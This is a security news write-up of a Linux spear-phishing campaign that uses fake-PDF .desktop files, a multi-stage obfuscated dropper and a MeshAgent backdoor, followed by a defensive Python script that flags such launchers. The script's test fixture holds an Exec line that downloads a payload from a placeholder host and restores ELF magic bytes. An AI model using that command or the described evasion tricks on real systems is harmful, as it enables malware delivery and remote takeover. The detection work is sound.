New ‘Sindoor Dropper’ Malware Targets Linux Systems Using Malicious .desktop Files
A new malware campaign, known as “Sindoor Dropper,” specifically targets Linux systems through spear-phishing and a multi-stage infection chain. The campaign uses lures related to the recent India-Pakistan conflict, referred to as Operation Sindoor, to entice victims into executing malicious files. A notable aspect of this activity is its use of weaponised .desktop files, a tactic previously linked to the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.

The attack begins when a user opens a malicious .desktop file named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which disguises itself as a standard PDF document. According to Nextron’s analysis, upon execution it presents a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex and heavily obfuscated infection process in the background.
The infection process is designed to evade both static and dynamic analysis, with the initial payload reportedly showing zero detections on VirusTotal at the time of its discovery. The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd). The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes to bypass security scans on platforms like Google Docs; the .desktop file restores these bytes on the victim’s machine, making the binary executable again. This starts a multi-stage process in which each component decrypts and executes the next. The chain incorporates basic anti-virtual-machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime. All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further complicate analysis.

The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance, granting the attacker full remote access to the compromised system. This access enables the attacker to monitor user activity, move laterally across the network, and exfiltrate sensitive data.

The Sindoor Dropper campaign signals an evolution in threat actor tradecraft, with a distinct focus on Linux environments, which phishing campaigns have historically targeted less often.
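As an added example (not from the Nextron report or this article), the following Python triage script parses .desktop files and flags the traits described above: a misleading double extension, a displayed Name ending in .pdf on an Application entry, an Exec= line that fetches remote content, and an Exec= line that writes an ELF magic header back into a file. The two sample entries are constructed fixtures; the hostname and paths in them are placeholders.

```python
"""Heuristic triage of Linux .desktop files for the lure pattern described above."""
import re
from configparser import ConfigParser, Error
from pathlib import Path

# A document extension immediately before ".desktop" (e.g. "report.pdf.desktop").
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)\.desktop$", re.I)
# Common command-line fetchers appearing in Exec=.
FETCH = re.compile(r"\b(curl|wget)\b")
# Literal ELF magic written back via shell escapes or hex: \x7fELF, \177ELF, 7f454c46.
ELF_MAGIC = re.compile(r"\\x7f\s*ELF|\\177\s*ELF|7f454c46", re.I)


def triage_desktop(filename: str, content: str) -> list[str]:
    """Return a list of findings for one .desktop file; empty means nothing suspicious."""
    findings = []
    if DOC_EXT.search(filename):
        findings.append("double-extension filename")
    # .desktop files are INI-style; disable interpolation so "%U" etc. parse cleanly.
    cp = ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(content)
    except Error:
        return findings + ["unparseable .desktop content"]
    if not cp.has_section("Desktop Entry"):
        return findings
    entry = cp["Desktop Entry"]
    name, exec_line = entry.get("Name", ""), entry.get("Exec", "")
    if entry.get("Type", "") == "Application" and re.search(r"\.(pdf|docx?)$", name, re.I):
        findings.append("Name mimics a document")
    if FETCH.search(exec_line):
        findings.append("Exec fetches remote content")
    if ELF_MAGIC.search(exec_line):
        findings.append("Exec writes an ELF magic header")
    return findings


def scan_paths(paths: list[str]) -> dict[str, list[str]]:
    """Triage every .desktop file found under the given directories (hypothetical helper)."""
    results = {}
    for root in paths:
        for p in Path(root).rglob("*.desktop"):
            findings = triage_desktop(p.name, p.read_text(errors="replace"))
            if findings:
                results[str(p)] = findings
    return results


# Constructed fixtures: one entry shaped like the lure, one ordinary launcher.
SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s http://placeholder.invalid/shjdfhd -o /tmp/f; printf '\\177ELF' | dd of=/tmp/f conv=notrunc"
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""
```

Run `scan_paths(["~/.local/share/applications", "~/Desktop"])` (expanded as appropriate) to sweep the usual user-writable launcher locations.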
Categories: Malware Campaign, Linux Targeting, Phishing Techniques
Tags: Sindoor Dropper, Malware, Linux, Spear-Phishing, Infection Chain, .desktop Files, AES Decryptor, Command-and-Control, Remote Access, Phishing Campaigns